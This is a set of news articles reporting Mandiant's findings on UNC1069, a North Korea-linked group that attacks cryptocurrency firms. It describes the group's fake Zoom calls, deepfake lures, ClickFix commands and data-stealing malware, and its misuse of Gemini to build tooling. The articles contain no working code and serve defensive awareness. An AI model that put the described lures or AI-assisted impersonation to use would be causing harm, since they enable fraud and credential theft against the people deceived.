North Korea-Linked UNC1069 Uses AI-Powered Attacks to Target Cryptocurrency Organizations

North Korea-Linked UNC1069 Uses AI Lures to Attack Cryptocurrency Organizations

The North Korea-linked threat actor known as UNC1069 has been observed targeting the cryptocurrency sector to steal sensitive data from Windows and macOS systems with the ultimate goal of facilitating financial theft. "The intrusion relied on a social engineering scheme involving a compromised Telegram account, a fake Zoom meeting, a ClickFix infection vector, and reported usage of AI-generated video to deceive the victim," Google Mandiant researchers Ross Inman and Adrian Hernandez said. UNC1069, assessed to be active since at least April 2018, has a history of conducting social engineering campaigns for financial gain using fake meeting invites and posing as investors from reputable companies on Telegram. It's also tracked by the broader cybersecurity community under the monikers CryptoCore and MASAN. In a report published last November, Google Threat Intelligence Group (GTIG) pointed out the threat actor's use of generative artificial intelligence (AI) tools like Gemini to produce lure material and other messaging related to cryptocurrency as part of efforts to support its social engineering campaigns. The group has also been observed attempting to misuse Gemmini to develop code to steal cryptocurrency, as well as leverage deepfake images and video lures mimicking individuals in the cryptocurrency industry in its campaigns to distribute a backdoor called BIGMACHO to victims by passing it off as a Zoom software development kit (SDK). "Since at least 2023, the group has shifted from spear-phishing techniques and traditional finance (TradFi) targeting towards the Web3 industry, such as centralized exchanges (CEX), software developers at financial institutions, high-technology companies, and individuals at venture capital funds," Google said. In the latest intrusion documented by the tech giant's threat intelligence division, UNC1069 is said to have deployed as many as seven unique malware families, including several new malware families, such as SILENCELIFT, DEEPBREATH, and CHROMEPUSH. It all starts when a victim is approached by the threat actor via Telegram by impersonating venture capitalists and, in a few cases, even using compromised accounts of legitimate entrepreneurs and startup founders. Once contact is established, the threat actor uses Calendly to schedule a 30-minute meeting with them. The meeting link is designed to redirect the victim to a fake website masquerading as Zoom ("zoom.uswe05[.]us"). In certain cases, the meeting links are directly shared via messages on Telegram, often using Telegram's hyperlink feature to hide the phishing URLs. Regardless of the method used, as soon as the victim clicks the link, they are presented with a fake video call interface that mirrors Zoom, urging them to enable their camera and enter their name. Once the target joins the meeting, they are displayed a screen that resembles an actual Zoom meeting. However, it's suspected that videos are either deepfakes or real recordings stealthily captured from other victims who had previously fallen prey to the same scheme. It's worth noting that Kaspersky is tracking the same campaign under the name GhostCall, which was documented in detail in October 2025. "Their webcam footage had been unknowingly recorded, then uploaded to attacker-controlled infrastructure, and reused to deceive other victims, making them believe they were participating in a genuine live call," the Russian security vendor noted at the time. "When the video replay ended, the page smoothly transitioned to showing that user's profile image, maintaining the illusion of a live call." The attack proceeds to the next phase when the victim is shown a bogus error message about a purported audio issue, after which they are prompted to download and run a ClickFix-style troubleshooting command to address the problem. In the case of macOS, the commands lead to the delivery of an AppleScript that, in turn, drops a malicious Mach-O binary on the system. Called WAVESHAPER, the malicious C++ executable is designed to gather system information and distribute a Go-based downloader codenamed HYPERCALL, which is then used to serve additional payloads - DEEPBREATH is equipped to manipulate macOS's Transparency, Consent, and Control (TCC) database to gain file system access, enabling it to steal iCloud Keychain credentials, and data from Google Chrome, Brave, and Microsoft Edge, Telegram, and the Apple Notes application. Like DEEPBREATH, CHROMEPUSH also acts as a data stealer, only it's written in C++ and is deployed as a browser extension to Google Chrome and Brave browsers by masquerading as a tool for editing Google Docs offline. It also comes with the ability to record keystrokes, observe username and password inputs, and extract browser cookies. "The volume of tooling deployed on a single host indicates a highly determined effort to harvest credentials, browser data, and session tokens to facilitate financial theft," Mandiant said. "While UNC1069 typically targets cryptocurrency startups, software developers, and venture capital firms, the deployment of multiple new malware families alongside the known downloader SUGARLOADER marks a significant expansion in their capabilities."

Google Warns of AI-Powered North Korean Malware Campaign Targeting Crypto, DeFi - Decrypt

Experts warn that trusted digital identities are becoming the weakest link. Google's security team at Mandiant has warned that North Korean hackers are incorporating artificial intelligence-generated deepfakes into fake video meetings as part of increasingly sophisticated attacks against crypto companies, according to a report released Monday. Mandiant said it recently investigated an intrusion at a fintech company that it attributes to UNC1069, or "CryptoCore", a threat actor linked with high confidence to North Korea. The attack used a compromised Telegram account, a spoofed Zoom meeting, and a so-called ClickFix technique to trick the victim into running malicious commands. Investigators also found evidence that AI-generated video was used to deceive the target during the fake meeting. "Mandiant has observed UNC1069 employing these techniques to target both corporate entities and individuals within the cryptocurrency industry, including software firms and their developers, as well as venture capital firms and their employees or executives," the report said. The warning comes as North Korea's cryptocurrency thefts continue to grow in scale. In mid-December, blockchain analytics firm Chainalysis said North Korean hackers stole $2.02 billion in cryptocurrency in 2025, a 51% increase from the year before. The total amount stolen by DPRK-linked actors now stands at roughly $6.75 billion, even as the number of attacks has declined. The findings highlight a broader shift in how state-linked cybercriminals are operating. Rather than relying on mass phishing campaigns, CryptoCore and similar groups are focusing on highly tailored attacks that exploit trust in routine digital interactions, such as calendar invites and video calls. In this way, North Korea is achieving larger thefts through fewer, more targeted incidents. According to Mandiant, the attack began when the victim was contacted on Telegram by what appeared to be a known cryptocurrency executive whose account had already been compromised. After building rapport, the attacker sent a Calendly link for a 30-minute meeting that directed the victim to a fake Zoom call hosted on the group's own infrastructure. During the call, the victim reported seeing what appeared to be a deepfake video of a well-known crypto CEO. Once the meeting began, the attackers claimed there were audio problems and instructed the victim to run "troubleshooting" commands, a ClickFix technique that ultimately triggered the malware infection. Forensic analysis later identified seven distinct malware families on the victim's system, deployed in an apparent attempt to harvest credentials, browser data and session tokens for financial theft and future impersonation. Fraser Edwards, co-founder and CEO of decentralized identity firm cheqd, said the attack reflects a pattern he is seeing repeatedly against people whose jobs depend on remote meetings and rapid coordination. "The effectiveness of this approach comes from how little has to look unusual," Edwards said. "The sender is familiar. The meeting format is routine. There is no malware attachment or obvious exploit. Trust is leveraged before any technical defence has a chance to intervene." Edwards said deepfake video is typically introduced at escalation points, such as live calls, where seeing a familiar face can override doubts created by unexpected requests or technical issues. "Seeing what appears to be a real person on camera is often enough to override doubt created by an unexpected request or technical issue. The goal is not prolonged interaction, but just enough realism to move the victim to the next step," he said. He added that AI is now being used to support impersonation outside of live calls. "It is used to draft messages, correct tone of voice, and mirror the way someone normally communicates with colleagues or friends. That makes routine messages harder to question and reduces the chance that a recipient pauses long enough to verify the interaction," he explained. Edwards warned the risk will increase as AI agents are introduced into everyday communication and decision-making. "Agents can send messages, schedule calls, and act on behalf of users at machine speed. If those systems are abused or compromised, deepfake audio or video can be deployed automatically, turning impersonation from a manual effort into a scalable process," he said. It's "unrealistic" to expect most users to know how to spot a deepfake, Edwards said, adding that, "The answer is not asking users to pay closer attention, but building systems that protect them by default. That means improving how authenticity is signalled and verified, so users can quickly understand whether content is real, synthetic, or unverified without relying on instinct, familiarity, or manual investigation."

AI-assisted hacking group hits targets with a complicated 'social engineering' scam that involves deepfaked CEOs, spoofed Zoom calls and a malicious troubleshooting program

This is one of many scams made in tandem with AI tools right now. A hacking group reportedly based out of North Korea has come up with a "new tooling and AI-enabled social engineering" scam, according to Google, and it's pretty complicated. Effectively, it uses a hacked account to send a Zoom link via a calendar invite to an uncompromised account. That version of Zoom is, in fact, a spoof, and what targets are met with is a deepfaked version of the account owner. Google's report notes that a version of this deepfake takes the form "of a CEO from another cryptocurrency company." Once in the meeting, the deepfaked user claims to have technical issues and directs the target on how to troubleshoot their PC. The troubleshooting prompt leads them to run an infected string of commands that then unleashes a series of backdoors and data miners on the victim's PC. Google calls it "AI-enabled social engineering" and notes 7 new malware families used in the attack. UNC1069 are the actors Google has identified as being behind the scam. They have reportedly been active since 2018 and were found to have been using Gemini last year to "develop code to steal cryptocurrency, as well as to craft fraudulent instructions impersonating a software update to extract user credentials". Google says UNC1069 is "employing these techniques to target both corporate entities and individuals within the cryptocurrency industry, including software firms and their developers, as well as venture capital firms and their employees or executives." This hack needs access to an account to start in the first place, so Google notes further attacks have "a dual purpose; enabling cryptocurrency theft and fueling future social engineering campaigns by leveraging victim's identity and data." Though Google states that the account linked to the group has been terminated, Gemini was used at some point "to develop tooling, conduct operational research, and assist during the reconnaissance stages." Gemini is not the only AI tool being used in similar cybercrimes. Antivirus creator and cybersecurity company Kaspersky claims hacking group BlueNoroff is using GPT-4o to enhance images to convince targets. As AI gets more impressive and complicated, so too will the scams to accompany it. One can only hope that anti-scam measures become equally clever.

North Korea Linked Hackers Deploy New Crypto Malware

Mandiant, which operates under Google Cloud, has tracked the suspected North Korean scammers since 2018, but AI has helped scale up malicious attacks since November 2025. North Korea-linked threat actors are escalating social engineering campaigns targeting cryptocurrency and fintech companies, deploying new malware designed to harvest sensitive data and steal digital assets. In a recent campaign, a threat cluster tracked as UNC1069 deployed seven malware families aimed at capturing and exfiltrating victim data, according to a Tuesday report by Mandiant, a US cybersecurity firm Mandiant which operates under Google Cloud. The campaign relied on social engineering schemes involving compromised Telegram accounts and fake Zoom meetings with deepfake videos generated through artificial intelligence tools. "This investigation revealed a tailored intrusion resulting in the deployment of seven unique malware families, including a new set of tooling designed to capture host and victim data: SILENCELIFT, DEEPBREATH and CHROMEPUSH," the report states. Related: CZ sounds alarm as 'SEAL' team uncovers 60 fake IT workers linked to North Korea Mandiant said the activity represents an expansion of the group's operations, primarily targeting crypto firms, software developers and venture capital companies. The malware included two newly discovered, sophisticated data-mining viruses, named CHROMEPUSH and DEEPBREATH, which are designed to bypass key operating system components and gain access to personal data. The threat actor with "suspected" North Korean ties has been tracked by Mandiant since 2018, but AI advancements helped the malicious actor scale up his efforts and include "AI-enabled lures in active operations" for the first time in November 2025, according to a report at the time from the Google Threat Intelligence Group. Cointelegraph contacted Mandiant for additional details regarding the attribution, but had not received a response by publication. Related: Balancer hack shows signs of months-long planning by skilled attacker In one intrusion outlined by Mandiant, attackers used a compromised Telegram account belonging to a crypto founder to initiate contact. The victim was invited to a Zoom meeting featuring a fabricated video feed in which the attacker claimed to be experiencing audio problems. The attacker then directed the user to run troubleshooting commands in their system to fix the purported audio issue in a scam known as a ClickFix attack. The provided troubleshooting commands had embedded a hidden single command that initiated the infection chain, according to Mandiant. North Korea-linked illicit actors have been a persistent threat to both crypto investors and Web3-native companies. In June 2025, four North Korean operatives infiltrated multiple crypto firms as freelance developers, stealing a cumulative $900,000 from these startups, Cointelegraph reported. Earlier that year, the Lazarus Group was linked to the $1.4 billion hack of Bybit, one of the largest crypto thefts on record.

Google Cloud Sounds the Alarm: North Korea's New AI Crypto Malware Is Draining Wallets

Google Cloud warns that North Korea-linked hackers are using AI-powered deepfake Zoom calls and new malware strains to target crypto firms. | Credit: CCN.com * Google Cloud's Mandiant has identified a new North Korea-linked malware campaign targeting crypto companies, developers, and venture capital firms. * The threat group, tracked as UNC1069, is deploying seven malware families, including newly discovered strains like CHROMEPUSH and DEEPBREATH. * The attackers are using AI-powered social engineering, including deepfake Zoom calls and compromised Telegram accounts, to trick victims into installing malware. * Crypto companies remain prime targets due to direct access to funds, remote communication workflows, and irreversible blockchain transactions. A new warning from Google Cloud is putting the crypto industry on high alert. Mandiant, the cybersecurity firm operating under Google Cloud, says a North Korea-linked threat group is deploying advanced malware designed to steal cryptocurrency and sensitive data, and artificial intelligence is helping them scale faster than ever. According to Mandiant, the threat cluster, tracked as UNC1069, has launched a new wave of targeted attacks against crypto companies, software developers, and venture capital firms. The campaign includes seven distinct malware families, some newly discovered, that are capable of bypassing system protections and extracting wallet-related information. The development marks a significant escalation in cyber threats facing the digital asset ecosystem. How the New AI-Driven Crypto Malware Works The attackers are not relying on brute-force hacks. Instead, they are using social engineering, a tactic that manipulates people into giving access voluntarily. In one case documented by Mandiant, attackers compromised a Telegram account belonging to a crypto founder. They then contacted a target and invited them to what appeared to be a legitimate Zoom meeting. The twist: the meeting featured a deepfake video created using artificial intelligence. During the call, the attacker claimed there were audio issues and asked the victim to run troubleshooting commands. Hidden within those commands was malicious code that triggered the infection process, a method known as a ClickFix attack. Once installed, the malware begins collecting sensitive information from the victim's device. The Malware Families Targeting Crypto Users Mandiant identified seven malware families used in the campaign. Among the most concerning are two newly discovered strains: * CHROMEPUSH * DEEPBREATH These programs are designed to bypass key operating system components and gain access to browser data, stored credentials, and potentially cryptocurrency wallet information. Another tool, named SILENCELIFT, was also deployed in the intrusion chain. According to the report, these malware families are tailored to capture host data, harvest login credentials, and exfiltrate information without immediately alerting victims. The targeting appears highly selective, focusing primarily on crypto-native businesses and individuals with access to digital assets. Why AI Is Making These Attacks More Dangerous Mandiant has tracked the suspected North Korea-linked actors since 2018. However, the use of AI marks a new phase. The Google Threat Intelligence Group previously noted that in November 2025, it began incorporating AI-enabled lures into active operations for the first time. Deepfake videos and automated impersonation tactics make phishing attempts more convincing and harder to detect. Artificial intelligence allows attackers to: * Create realistic fake video calls * Mimic voices and facial expressions * Generate believable messages at scale * Personalize attacks using scraped data This lowers the cost of running large-scale campaigns and increases success rates. Why Crypto Companies Are Prime Targets Cryptocurrency businesses are attractive targets for several reasons: * Direct access to funds: Wallet credentials can immediately translate into financial gain. * High-value individuals: Founders, developers, and executives often manage large sums. * Remote operations: Crypto teams frequently operate via Telegram, Discord, and Zoom, making impersonation easier. * Irreversible transactions: Stolen crypto is often difficult to recover. North Korea-linked actors have repeatedly targeted the sector. Earlier in 2025, four North Korean operatives infiltrated crypto startups as freelance developers, stealing nearly $900,000. The Lazarus Group, another North Korea-linked entity, was connected to the $1.4 billion Bybit hack. These attacks are part of a broader pattern of state-linked cyber activity aimed at generating revenue. What Google Cloud and Mandiant Are Warning Mandiant's report highlights that this campaign represents an expansion of previous operations. The combination of social engineering and multiple malware families suggests a coordinated, well-resourced effort. Although Mandiant describes the actors as "suspected" of having North Korean ties, the activity aligns with tactics observed in earlier campaigns. The company has not publicly released further attribution details at this time. How Crypto Users Can Protect Themselves For individual investors and companies alike, the threat underscores the importance of cybersecurity hygiene. Key precautions include: Businesses should also implement internal policies to verify identities during remote meetings and restrict system-level command execution to trusted administrators. Major North Korea-Linked Hacking Attacks in Crypto A Growing Cybersecurity Challenge in Crypto The broader message from Google Cloud is clear: crypto-focused cybercrime is evolving. The integration of AI into malware campaigns significantly raises the bar for defense. Social engineering attacks that once relied on poorly written phishing emails now involve deepfake video calls and customized scripts. As digital assets become more mainstream, they remain a lucrative target for sophisticated threat actors. While the crypto industry continues to build new infrastructure, it must also strengthen its security practices. AI-powered malware is not a theoretical risk; it is already active. The Google Cloud alarm suggests that vigilance is no longer optional.